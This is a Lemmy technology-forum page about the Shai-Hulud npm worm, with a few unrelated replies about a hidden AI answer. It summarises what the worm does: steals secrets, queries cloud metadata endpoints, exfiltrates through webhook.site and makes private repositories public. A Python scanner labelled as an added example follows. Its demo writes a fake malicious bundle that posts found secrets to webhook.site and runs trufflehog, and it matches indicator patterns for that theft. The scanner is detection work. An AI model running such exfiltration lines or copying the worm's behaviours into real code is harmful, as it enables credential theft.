this post was submitted on 16 Sep 2025
Technology

75205 readers
2980 users here now

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, this includes using AI responses and summaries. To ask if your bot can be added please contact a mod.
  9. Check for duplicates before posting, duplicates may be removed
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots


founded 2 years ago
MODERATORS
 

This morning, we were alerted to a large-scale attack against npm. This appears to be the work of the same threat actors behind the Nx attack on August 27th 2025. This was originally published by Socket and StepSecurity, who noted 40 packages had been compromised; since then an additional 147 packages have been infected with malware, including packages from CrowdStrike.

The scale, scope and impact of this attack are significant. The attackers are using largely the same playbook as the original attack, but have stepped up their game. They have turned it into a full worm, which does these things automatically:

  • Steal secrets and publish them to GitHub publicly
  • Run trufflehog and query Cloud metadata endpoints to gather secrets
  • Attempt to create a new GitHub action with a data exfiltration mechanism through webhook[.]site
  • Iterate the repositories on GitHub a user has access to, and make them public

Since our initial alert this morning we’ve confirmed the following additional behaviours and important details. For those who don't know, Shai Hulud is the name of the worm in the Dune franchise. A clear indication of the intent of the attackers.
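As an added example that is not part of the original post or of the Socket, StepSecurity or Aikido write-ups it cites: a small Python scanner that walks a checked-out project and its `node_modules` looking for the two things a self-propagating npm worm needs, an install-time lifecycle hook (`preinstall`/`install`/`postinstall`/`prepare`) and the behaviours the post lists (trufflehog, cloud metadata endpoint queries, exfiltration via webhook.site, GitHub API use). The indicator regexes are an assumption derived from that behaviour list, not the published IoC set; the package names and file contents in the demo tree are constructed for the demonstration. Use the vendors' real IoC lists for actual triage and treat hits here as leads, not verdicts.

```python
"""Heuristic scan of an npm project tree for install hooks and the
behaviours named in the Shai-Hulud post. Added example, not the post's
or any vendor's code; indicator patterns are assumptions."""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs automatically during `npm install`; a worm that
# spreads through published packages needs one of these to execute.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Hypothetical indicator patterns built from the behaviours the post lists.
# 169.254.169.254 is the link-local metadata address used by AWS, Azure
# and GCP; metadata.google.internal is GCP's hostname for the same service.
INDICATORS = {
    "webhook.site exfil": re.compile(r"webhook\.site", re.I),
    "trufflehog secret scan": re.compile(r"trufflehog", re.I),
    "cloud metadata endpoint": re.compile(
        r"169\.254\.169\.254|metadata\.google\.internal", re.I),
    "github api use": re.compile(r"api\.github\.com", re.I),
}


def scan_text(text):
    """Return the names of every indicator pattern found in `text`."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_package_json(path):
    """Report install hooks (and indicators inside them) for one package.json.
    Returns a list of (package name, finding) tuples."""
    findings = []
    try:
        pkg = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return findings
    name = pkg.get("name", "?")
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append((name, f"install hook {hook}: {cmd}"))
            findings.extend((name, f"{hook} references {hit}")
                            for hit in scan_text(cmd))
    return findings


def scan_tree(root):
    """Walk `root`: every package.json is checked for install hooks, and every
    .js/.yml/.yaml file (bundles run by hooks, GitHub workflow files) is
    grepped for the indicator patterns. Returns (source, finding) tuples."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        if p.name == "package.json":
            findings.extend(scan_package_json(p))
        elif p.suffix in (".js", ".yml", ".yaml"):
            try:
                text = p.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            rel = str(p.relative_to(root))
            findings.extend((rel, hit) for hit in scan_text(text))
    return findings


def build_sample_tree():
    """Create a throwaway project tree. All packages and contents are
    constructed for this demo and do not correspond to real npm packages."""
    root = Path(tempfile.mkdtemp(prefix="npm-scan-"))
    clean = root / "node_modules" / "example-clean"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps(
        {"name": "example-clean", "scripts": {"test": "node test.js"}}))
    bad = root / "node_modules" / "example-bad"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps(
        {"name": "example-bad", "scripts": {"postinstall": "node bundle.js"}}))
    (bad / "bundle.js").write_text(
        'fetch("https://webhook.site/" + id, {method: "POST", body: found});\n'
        'exec("trufflehog filesystem .");\n')
    wf = root / ".github" / "workflows"
    wf.mkdir(parents=True)
    (wf / "ci.yml").write_text(
        "on: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - run: npm test\n")
    return root


if __name__ == "__main__":
    for source, finding in scan_tree(build_sample_tree()):
        print(f"{source}: {finding}")
```

Run it against a real checkout with `scan_tree("path/to/project")`; a package whose only hook is `prepare` in a first-party repo is normal, but a third-party dependency that gained a `postinstall` hook in a patch release, or any bundle that mentions webhook.site or the metadata address, deserves a look at the package's published tarball before the next `npm install`.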

[–] A_A@lemmy.world 1 points 1 hour ago (1 children)

See my answer to the other user, that is:

Dear Sir or Mrs lennivelkant @ discuss.tchncs.de,

most people, even people in technology, have absolutely no clue what this thing is all about ... and reading the title here gives them no clue either.

Even going through the article, most people in technology would still not know how this may affect them - - so context should be at least located - - this is what I was trying to do.

People in computer science see their field of expertise so deeply that they come to believe that the basis of their field is ubiquitous. Well, it is not. Not at all.

You people in that field are suffering from that delusion.

Now, the comment I wrote was a question. Only if you click on that question do you get this hidden a.i. answer that was included and hidden in the comment. That answer was not the comment itself.

I certainly hope you don't have more of these questions and that people in "c.s." (computer science for the rest of us) could realize how far from the mundane they are.

all the best, - - A_A @ ...

[–] floquant@lemmy.dbzer0.com 1 points 1 hour ago

I do have a ton more questions, but I'm not sure if I want to ask them.